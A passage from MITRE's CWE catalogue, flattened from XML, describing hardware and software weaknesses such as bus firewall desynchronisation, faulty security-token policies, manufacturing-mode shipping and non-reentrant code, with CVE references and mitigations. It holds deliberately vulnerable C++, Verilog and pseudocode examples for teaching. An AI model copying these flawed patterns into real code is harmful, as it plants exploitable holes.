https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011 - - - CVE-2020-12446 - Driver exposes access to Model Specific Register (MSR) registers, allowing admin privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446 - - - CVE-2015-2150 - Virtualization product does not restrict access to PCI command registers, allowing host crash from the guest. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150 - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-05-08 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns - - - Anders Nordstrom, Alric Althoff - Tortuga Logic - 2021-10-11 - Provided detection methods and observed examples - - - Nicole Fern - Riscure - 2021-10-12 - Provided detection methods - - - - - The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas. - Sections of a product intended to have restricted access may be inadvertently or intentionally rendered accessible when the implemented physical protections are insufficient. The specific requirements around how robust the design of the physical protection mechanism needs to be depends on the type of product being protected. Selecting the correct physical protection mechanism and properly enforcing it through implementation and manufacturing are critical to the overall physical security of the product. - - - - - - - - - - - - - - - Architecture and Design - This weakness can arise if design decisions are made that do not align with the intended physical protection of the product - - - Manufacturing - While the architecture and design phase of the product may have accurately met the intended robustness for product physical protections, this phase may introduce the weakness through errors in physically manufacturing the product. - - - - - Confidentiality - Integrity - Access Control - Varies by Context - - - - - Architecture and Design - Specific protection requirements depend strongly on contextual factors including the level of acceptable risk associated with compromise to the product's protection mechanism. Designers could incorporate anti-tampering measures that protect against or detect when the product has been tampered with. - - - Testing - The testing phase of the lifecycle should establish a method for determining whether the protection mechanism is sufficient to prevent unauthorized access. - - - Manufacturing - Ensure that all protection mechanisms are fully activated at the time of manufacturing and distribution. - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-05-28 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Insufficient Physical Protection Mechanism - - - - The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete. - - Many high-performance on-chip bus protocols and processor data-paths employ separate channels for control and data to increase parallelism and maximize throughput. Bugs in the hardware logic that handle errors and security checks can make it possible for data to be forwarded before the completion of the security checks. If the data can propagate to a location in the hardware observable to an attacker, loss of data confidentiality can occur. 'Meltdown' is a concrete example of how de-synchronization between data and permissions checking logic can violate confidentiality requirements. Data loaded from a page marked as privileged was returned to the cpu regardless of current privilege level for performance reasons. The assumption was that the cpu could later remove all traces of this data during the handling of the illegal memory access exception, but this assumption was proven false as traces of the secret data were not removed from the microarchitectural state. - - - - - - - - Primary - - - - - - - - - - - Architecture and Design - The weakness can be introduced in the data transfer or bus protocol itself or in the implementation. - - - Implementation - - - - - Confidentiality - Read Memory - Read Application Data - - - - - Architecture and Design - - Thoroughly verify the data routing logic to ensure that any error handling or security checks effectively block illegal dataflows. - - - - - - There are several standard on-chip bus protocols used in modern SoCs to allow communication between components. There are a wide variety of commercially available hardware IP implementing the interconnect logic for these protocols. A bus connects components which initiate/request communications such as processors and DMA controllers (bus masters) with peripherals which respond to requests. In a typical system, the privilege level or security designation of the bus master along with the intended functionality of each peripheral determine the security policy specifying which specific bus masters can access specific peripherals. This security policy (commonly referred to as a bus firewall) can be enforced using separate IP/logic from the actual interconnect responsible for the data routing. - The firewall and data routing logic becomes de-synchronized due to a hardware logic bug allowing components that should not be allowed to communicate to share data. For example, consider an SoC with two processors. One is being used as a root of trust and can access a cryptographic key storage peripheral. The other processor (application cpu) may run potentially untrusted code and should not access the key store. If the application cpu can issue a read request to the key store which is not blocked due to de-synchronization of data routing and the bus firewall, disclosure of cryptographic keys is possible. - All data is correctly buffered inside the interconnect until the firewall has determined that the endpoint is allowed to receive the data. - - - - - CVE-2017-5754 - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754 - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-05-22 - - - CWE Content Team - MITRE - 2020-08-20 - updated Description, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - During execution of non-reentrant code, the software performs a call that unintentionally produces a nested invocation of the non-reentrant code. - In complex software, a single function call may lead to many different possible code paths, some of which may involve deeply nested calls. It may be difficult to foresee all possible code paths that could emanate from a given function call. In some systems, an external actor can manipulate inputs to the system and thereby achieve a wide range of possible control flows. This is frequently of concern in software that executes script from untrusted sources. Examples of such software are web browsers and PDF readers. A weakness is present when one of the possible code paths resulting from a function call alters program state that the original caller assumes to be unchanged during the call. - - - - - - - - Primary - - - - - - - - Integrity - Unexpected State - Unknown - Exploitation of this weakness can leave the application in an unexpected state and cause variables to be reassigned before the first invocation has completed. This may eventually result in memory corruption or unexpected code execution. - - - - - Architecture and Design - When architecting a system that will execute untrusted code in response to events, consider executing the untrusted event handlers asynchronously (asynchronous message passing) as opposed to executing them synchronously at the time each event fires. The untrusted code should execute at the start of the next iteration of the thread’s message loop. In this way, calls into non-reentrant code are strictly serialized, so that each operation completes fully before the next operation begins. Special attention must be paid to all places where type coercion may result in script execution. Performing all needed coercions at the very beginning of an operation can help reduce the chance of operations executing at unexpected junctures. - High - - - Implementation - Make sure the code (e.g., function or class) in question is reentrant by not leveraging non-local data, not modifying its own code, and not calling other non-reentrant code. - High - - - - - The implementation of the Widget class in the following C++ code is an example of code that is not designed to be reentrant. If an invocation of a method of Widget inadvertently produces a second nested invocation of a method of Widget, then data member backgroundImage may unexpectedly change during execution of the outer call. - class Widget{private:Image* backgroundImage;public:void click(){if (backgroundImage){backgroundImage->click();}}void changeBackgroundImage(Image* newImage){if (backgroundImage){delete backgroundImage;}backgroundImage = newImage;}}class Image{public:void click(){scriptEngine->fireOnImageClick();/* perform some operations using “this” pointer */}} - Looking closer at this example, Widget::click() calls backgroundImage->click(), which in turn calls scriptEngine->fireOnImageClick(). The code within fireOnImageClick() invokes the appropriate script handler routine as defined by the document being rendered. In this scenario this script routine is supplied by an adversary and this malicious script makes a call to Widget::changeBackgroundImage(), deleting the Image object pointed to by backgroundImage. When control returns to Image::click, the function’s "backgroundImage "this" pointer (which is the former value of backgroundImage) is a dangling pointer. The root of this weakness is that while one operation on Widget (click) is in the midst of executing, a second operation on the Widget object may be invoked (in this case, the second invocation is a call to different method, namely changeBackgroundImage) that modifies the non-local variable. - - - This is another example of C++ code that is not designed to be reentrant. - class Request{private:std::string uri;/* ... */public:void setup(ScriptObject* _uri){this->uri = scriptEngine->coerceToString(_uri);/* ... */}void send(ScriptObject* _data){Credentials credentials = GetCredentials(uri);std::string data = scriptEngine->coerceToString(_data);doSend(uri, credentials, data);}} - The expected order of operations is a call to Request::setup(), followed by a call to Request::send(). Request::send() calls scriptEngine->coerceToString(_data) to coerce a script-provided parameter into a string. This operation may produce script execution. For example, if the script language is ECMAScript, arbitrary script execution may result if _data is an adversary-supplied ECMAScript object having a custom toString method. If the adversary's script makes a new call to Request::setup, then when control returns to Request::send, the field uri and the local variable credentials will no longer be consistent with one another. As a result, credentials for one resource will be shared improperly with a different resource. The root of this weakness is that while one operation on Request (send) is in the midst of executing, a second operation may be invoked (setup). - - - - - CVE-2014-1772 - In this vulnerability, by registering a malicious onerror handler, an adversary can produce unexpected re-entrance of a CDOMRange object. [REF-1098] - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1772 - - - CVE-2018-8174 - This CVE covers several vulnerable scenarios enabled by abuse of the Class_Terminate feature in Microsoft VBScript. In one scenario, Class_Terminate is used to produce an undesirable re-entrance of ScriptingDictionary during execution of that object’s destructor. In another scenario, a vulnerable condition results from a recursive entrance of a property setter method. This recursive invocation produces a second, spurious call to the Release method of a reference-counted object, causing a UAF when that object is freed prematurely. This vulnerability pattern has been popularized as “Double Kill”. [REF-1099] - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174 - - - - - - - - - - - - Simon Zuckerbraun - Trend Micro - 2018-12-20 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Related_Attack_Patterns - - - - - The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned. A scrubbing capability could be missing, insufficient, or incorrect. - - When a product is decommissioned - i.e., taken out of service - best practices or regulatory requirements may require the administrator to remove or overwrite sensitive data first, i.e. "scrubbing." Improper scrubbing of sensitive data from a decommissioned device leaves that data vulnerable to acquisition by a malicious actor. Sensitive data may include, but is not limited to, device/manufacturer proprietary information, user/device credentials, network configurations, and other forms of sensitive data. - - - - - - - - - - - - - Architecture and Design - - - Policy - - - Implementation - - - - - Confidentiality - Read Memory - - - - - Architecture and Design - - Functionality to completely scrub data from a product at the conclusion of its lifecycle should be part of the design phase. Trying to add this function on top of an existing architecture could lead to incomplete removal of sensitive information/data. - - - - Policy - - The manufacturer should describe the location(s) where sensitive data is stored and the policies and procedures for its removal. This information may be conveyed, for example, in an Administrators Guide or a Statement of Volatility. - - - - Implementation - - If the capability to wipe sensitive data isn't built-in, the manufacturer may need to provide a utility to scrub sensitive data from storage if that data is located in a place which is non-accessible by the administrator. One example of this could be when sensitive data is stored on an EEPROM for which there is no user/admin interface provided by the system. - - - - - - - - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Paul A. Wortman - Wells Fargo - 2020-05-28 - - - CWE Content Team - MITRE - 2020-08-20 - updated Potential_Mitigations, Related_Attack_Patterns - - - - - The product uses an obsolete encoding mechanism to implement access controls. - - Within a System-On-a-Chip (SoC), various circuits and hardware engines generate transactions for the purpose of accessing (read/write) assets or performing various actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (identifying the originator of the transaction) and a destination identity (routing the transaction to the respective entity). Sometimes the transactions are qualified with a Security Token. This Security Token helps the destination agent decide on the set of allowed actions (e.g., access to an asset for reads and writes). A policy encoder is used to map the bus transactions to Security Tokens that in turn are used as access-controls/protection mechanisms. A common weakness involves using an encoding which is no longer trusted, i.e., an obsolete encoding. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - Modify Files or Directories - Read Files or Directories - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Reduce Reliability - High - - - - - Architecture and Design - Implementation - - Security Token Decoders should be reviewed for design inconsistency and common weaknesses. - Access and programming flows should be tested in both pre-silicon and post-silicon testing. - - High - - - - - - For example, consider a system that has four bus masters. The table below provides bus masters, their Security Tokens, and trust assumptions. - - - Bus Master - Security Token Decoding - Trust Assumptions - - - Master_0 - "00" - Untrusted - - - Master_1 - "01" - Trusted - - - Master_2 - "10" - Untrusted - - - Master_3 - "11" - Untrusted - - - The policy encoding is to be defined such that Security Token will be used in implemented access-controls. The bits in the bus transaction that contain Security-Token information are Bus_transaction [15:11]. The assets are the AES-Key registers for encryption or decryption. The key of 128 bits is implemented as a set of four, 32-bit registers. - - - Register - Field description - - - AES_ENC_DEC_KEY_0 - AES key [0:31] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_1 - AES key [32:63] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_2 - AES key [64:95] for encryption or decryption, Default 0x00000000 - - - AES_ENC_DEC_KEY_4 - AES key [96:127] for encryption or decryption, Default 0x00000000 - - - Below is an example of a policy encoding scheme inherited from a previous project where all "ODD" numbered Security Tokens are trusted. - - - If (Bus_transaction[14] == "1")Trusted = "1"ElseTrusted = "0" - If (trusted) Allow access to AES-Key registersElseDeny access to AES-Key registers - - The inherited policy encoding is obsolete and does not work for the new system where an untrusted bus master with an odd Security Token exists in the system, i.e., Master_3 whose Security Token is "11". Based on the old policy, the untrusted bus master (Master_3) has access to the AES-Key registers. To resolve this, a register AES_KEY_ACCESS_POLICY can be defined to provide necessary, access controls: - - New Policy: - - - AES_KEY_ACCESS_POLICY - [31:0] Default 0x00000002 – agent with Security Token "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers - - - The AES_KEY_ACCESS_POLICY register defines which agents with a Security Token in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a Security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit and, if "0" (i.e., Clear), disallows the respective action to that corresponding agent. Thus, any bus master with Security Token "01" is allowed access to the AES-Key registers. Below is the Pseudo Code for policy encoding: - - - Security_Token[4:0] = Bus_transaction[15:11] - If (AES_KEY_ACCESS_POLICY[Security_Token] == "1")Allow access to AES-Key registersElseDeny access to AES-Key registers - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-04-18 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product's hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies. - - - Integrated circuits and hardware engines may provide access to resources (device-configuration, encryption keys, etc.) belonging to trusted firmware or software modules (commonly set by a BIOS or a bootloader). These accesses are typically controlled and limited by the hardware. Hardware design access control is sometimes implemented using a policy. A policy defines which entity or agent may or may not be allowed to perform an action. When a system implements multiple levels of policies, a control policy may allow direct access to a resource as well as changes to the policies themselves. - Resources that include agents in their control policy but not in their write policy could unintentionally allow an untrusted agent to insert itself in the write policy register. Inclusion in the write policy register could allow a malicious or misbehaving agent write access to resources. This action could result in security compromises including leaked information, leaked encryption keys, or modification of device configuration. - - - - - - - - - - - - - Architecture and Design - This weakness may be introduced during the design of a device when the architect does not comprehensively specify all of the policies required by an agent. - - - Implementation - This weakness may be introduced during implementation if device policy restrictions do not sufficiently constrain less-privileged clients. - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Read Files or Directories - Reduce Reliability - High - - - - - Architecture and Design - Implementation - Access-control-policy definition and programming flow must be sufficiently tested in pre-silicon and post-silicon testing. - - - - - Consider a system with a register for storing an AES key for encryption or decryption. The key is composed of 128 bits implemented as a set of four 32-bit registers. The key registers are resources and registers, AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary, access controls. - The control-policy register defines which agents can write to the read-policy and write-policy registers. The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each 32-bit register can support access control for a maximum of 32 agents. The number of the bit when set (i.e., "1") allows respective action from an agent whose identity matches the number of the bit and, if "0" (i.e., Clear), disallows the respective action to that corresponding agent. - - -RegisterField description -AES_ENC_DEC_KEY_0AES key [0:31] for encryption or decryptionDefault 0x00000000 -AES_ENC_DEC_KEY_1AES key [32:63] for encryption or decryptionDefault 0x00000000 -AES_ENC_DEC_KEY_2AES key [64:95] for encryption or decryptionDefault 0x00000000 -AES_ENC_DEC_KEY_3AES key [96:127] for encryption or decryptionDefault 0x00000000 -AES_KEY_CONTROL_POLICY[31:0] Default 0x00000018, meaning agent with identities "4" and "3" has read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers -AES_KEY_READ_POLICY[31:0] Default 0x00000002, agent with identity "1" can only read AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers -AES_KEY_WRITE_POLICY[31:0] Default 0x00000004, agent with identity "2" can only write to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers - - In the above example, the AES_KEY_CONTROL_POLICY register has agents with identities "4"and "3" in its policy. Assuming the agent with identity "4" is trusted and the agent with identity "3" is untrusted. The untrusted agent "3" can write to AES_KEY_WRITE_POLICY with a value of 0x0000000C thus allowing write access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. - -The AES_KEY_CONTROL_POLICY defines which agents have write access to the AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY, and the AES_KEY_WRITE_POLICY registers, -The AES-key registers can only be read or used by a crypto agent with identity "1" when bit #1 is set. -The AES-key registers can only be programmed by a trusted firmware with identity "2" when bit #2 is set. -For the above example, the control, read-and-write-policy registers’ values are defined as below. - - -RegisterField description -AES_KEY_CONTROL_POLICY[31:0] Default 0x00000010, meaning only agents with an identity of "4" have read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers -AES_KEY_READ_POLICY[31:0] Default 0x00000002, meaning only trusted firmware with an identity of "1" can program registers: -AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 -AES_KEY_WRITE_POLICY[31:0] Default 0x00000004, meaning only trusted firmware with an identity of "2" can program registers: -AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3 - - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns - - Agents Included in Control Policy are not Contained in Less-Privileged Policy - - - - The product released to market is released in pre-production or manufacturing configuration. - - Products in the pre-production or manufacturing stages are configured to have many debug hooks and debug capabilities, including but not limited to: - - Ability to override/bypass various cryptographic checks (including authentication, authorization, and integrity) - Ability to read/write/modify/dump internal state (including registers and memory) - Ability to change system configurations - Ability to run hidden or private commands that are not allowed during production (as they expose IP). - The above is by no means an exhaustive list, but it alludes to the greater capability and the greater state of vulnerability of a product during it's preproduction or manufacturing state. - Complexity increases when multiple parties are involved in executing the tests before the final production version. For example, a chipmaker might fabricate a chip and run its own preproduction tests, following which the chip would be delivered to the Original Equipment Manufacturer (OEM), who would now run a second set of different preproduction tests on the same chip. Only after both of these sets of activities are complete, can the overall manufacturing phase be called “complete” and have the “Manufacturing Complete” fuse blown. However, if the OEM forgets to blow the Manufacturing Complete fuse, then the system remains in the manufacturing stage, rendering the system both exposed and vulnerable. - - - - - - - - - - - - - - - - Implementation - - - Integration - - - Manufacturing - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Other - High - - - - - Implementation - Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown). - - - Integration - Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown). - - - Manufacturing - Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown). - - - - - This example shows what happens when a preproduction system is made available for production. - Suppose the chipmaker has a way of scanning all the internal memory (containing chipmaker-level secrets) during the manufacturing phase, and the way the chipmaker or the Original Equipment Manufacturer (OEM) marks the end of the manufacturing phase is by blowing a Manufacturing Complete fuse. Now, suppose that whoever blows the Manufacturing Complete fuse inadvertently forgets to execute the step to blow the fuse. - An attacker will now be able to scan all the internal memory (containing chipmaker-level secrets). - Blow the Manufacturing Complete fuse. - - - - - CVE-2019-13945 - Regarding SSA-686531, a hardware based manufacturing access on S7-1200 and -S7-200 SMART has occurred. A vulnerability has been identified in SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions), SIMATIC S7-200 SMART CPU family (All versions). There is an access mode used during manufacturing of S7-1200 CPUs that allows additional diagnostic functionality. The security vulnerability could be exploited by an attacker with physical access to the UART interface during boot process. At the time of advisory publication, no public exploitation of this security vulnerability was known. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13945 - - - CVE-2018-4251 - Laptops with Intel chipsets were found to be running in Manufacturing Mode. After this information was reported to the OEM, the vulnerability (CVE-2018-4251) was patched disallowing access to the interface. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4251 - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-05-31 - - - CWE Content Team - MITRE - 2020-08-20 - updated Description, Related_Attack_Patterns - - - - - The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer. - This typically occurs when the pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. This may result in exposure of sensitive information or possibly a crash. - - - - - - - Primary - - - - - - - - - Implementation - - - - - Confidentiality - Read Memory - - - Confidentiality - Bypass Protection Mechanism - By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service. - - - - - Buffer under-read - - - SFP8 - Faulty Buffer Access - - - - - - - - - Under-studied. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature - - - CWE Content Team - MITRE - 2019-09-19 - updated Common_Consequences, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect. - - Systems-On-a-Chip (SoC) (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify actions originated from various agents. These actions could be "read", "write", "program", "reset", "fetch", "compute", etc. Security Tokens are generated and assigned to every agent on the SoC that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Token based on its trust level or privileges. Incorrectly generated Security Tokens could result in the same token used for multiple agents or multiple tokens being used for the same agent. This condition could result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Files or Directories - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Gain Privileges or Assume Identity - Read Memory - Modify Memory - DoS: Crash, Exit, or Restart - High - - - - - Architecture and Design - Implementation - - - Generation of Security Tokens should be reviewed for design inconsistency and common weaknesses. - Security-Token definition and programming flow should be tested in pre-silicon and post-silicon testing. - - - - - - - Consider a system with a register for storing an AES key for encryption or decryption. The key is 128 bits long implemented as a set of four 32-bit registers. The key registers are assets, and register, AES_KEY_ACCESS_POLICY, is defined to provide necessary access controls. The access-policy register defines which agents, using a Security Token, may access the AES-key registers. Each bit in this 32-bit register is used to define a Security Token. There could be a maximum of 32 Security Tokens that are allowed access to the AES-key registers. When set (bit = "1") bit number allows action from an agent whose identity matches that bit number. If Clear (bit = "0") the action is disallowed for the corresponding agent. - - Let"s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are "1" and "2". - - - - Register - Description - Default - - - AES_ENC_DEC_KEY_0 - AES key [0:31] for encryption or decryption - 0x00000000 - - - AES_ENC_DEC_KEY_1 - AES key [32:63] for encryption or decryption - 0x00000000 - - - AES_ENC_DEC_KEY_2 - AES key [64:95] for encryption or decryption - 0x00000000 - - - AES_ENC_DEC_KEY_3 - AES key [96:127] for encryption or decryption - 0x00000000 - - - AES_KEY_ACCESS_POLICY - AES key access register [31:0] - 0x00000002 - - - - - An agent with a Security Token "1" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is "1". - - The SoC incorrectly generates Security Token "1" for every agent. In other words, both Main-controller and Aux-controller are assigned Security Token "1". - Both agents have access to the AES-key registers. - The SoC should correctly generate Security Tokens, assigning "1" to the Main-controller and "2" to the Aux-controller - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-03-06 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - Generation of Incorrect Security Identifiers - - - - Security-critical logic is not set to a known value on reset. - - When the device is first brought out of reset, the state of registers will be indeterminate if they have not been initialized by the logic. Before the registers are initialized, there will be a window during which the device is in an insecure state and may be vulnerable to attack. - - - - - - - Primary - - - - - - - - - - - Implementation - - - - - Access Control - Authentication - Authorization - Varies by Context - - - - - Implementation - Design checks should be performed to identify any uninitialized flip-flops used for security-critical functions. - - - Architecture and Design - All registers holding security-critical information should be set to a specific value on reset. - - - - - Shown below is a positive clock edge triggered flip-flop used to implement a lock bit for test and debug interface. When the circuit is first brought out of reset, the state of the flip-flop will be unknown until the enable input and D-input signals update the flip-flop state. In this example, an attacker can reset the device until the test and debug interface is unlocked and access the test interface until the lock signal is driven to a known state by the logic. - - always @(posedge clk) begin - if (en) lock_jtag <= d; - end - - The flip-flop can be set to a known value (0 or 1) on reset, but requires that the logic explicitly update the output of the flip-flop if the reset signal is active. - - always @(posedge clk) begin - if (~reset) lock_jtag <= 0; - else if (en) lock_jtag <= d; - end - - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Nicole Fern - Tortuga Logic - 2020-05-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Name, Type - - Missing Known Value on Reset for Registers Holding Security Settings - Unitialized Value on Reset for Registers Holding Security Settings - - - - The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions. - - A device or system frequently employs many power and sleep states during its normal operation (e.g., normal power, additional power, low power, hibernate, deep sleep, etc.). A device also may be operating within a debug condition. State transitions can happen from one power or debug state to another. If there is information available in the previous state which should not be available in the next state and is not properly removed before the transition into the next state, sensitive information may leak from the system. - - - - - - - - Primary - - - - - - - - - - - - - Architecture and Design - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Read Memory - Read Application Data - High - Sensitive information may be used to unlock additional capabilities of the device and take advantage of hidden functionalities which could be used to compromise device security. - - - - - Manual Analysis - Write a known pattern into each sensitive location. Enter the power/debug state in question. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the device needs to be fixed. Note that this test can likely be automated. - High - - - - - Architecture and Design - Implementation - During state transitions, information not needed in the next state should be removed before the transition to the next state. - - - - - This example shows how an attacker can take advantage of an incorrect state transition. - - Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible. - - - During the transition from A to B, the device does not scrub the memory. - - After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys. - For transition from state A to state B, remove information which should not be available once the transition is complete. - - - - - CVE-2020-12926 - Product software does not set a flag as per TPM specifications, thereby preventing a failed authorization attempt from being recorded after a loss of power. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12926 - - - - Power - - - - - - - - - - - - - Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi - Intel Corporation - 2020-05-31 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Functional_Areas - - Debug/Power State Transitions Leak Information - - - - The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information. - - “Unlocking a device” often means activating certain, unadvertised, debug and manufacturer-specific capabilities of a device using sensitive credentials. Unlocking a device might be necessary for the purpose of troubleshooting device problems. For example, suppose a device contains the ability to dump the content of the full system memory by disabling the memory-protection mechanisms. Since this is a highly security-sensitive capability, this capability is “locked” in the production part. Unless the device gets unlocked by supplying the proper credentials the debug capabilities are not available. For cases where the chip designer, chip manufacturer (fabricator), and manufacturing and assembly testers are the all employed by the same company, the compromise of the credentials are greatly reduced. However, when the chip designer is employed by one company, the chip manufacturer is employed by another company (a foundry), and the assemblers and testers are employed by yet a third company. Since these different companies will need to perform various tests on the device to verify correct device function, they all need to share the unlock key. Unfortunately, the level of secrecy and policy might be quite different at each company, greatly increasing the risk of sensitive credentials being compromised. - - - - - - - - - - - - - - - - Integration - - - Manufacturing - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Modify Memory - Read Memory - Modify Files or Directories - Read Files or Directories - Modify Application Data - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity 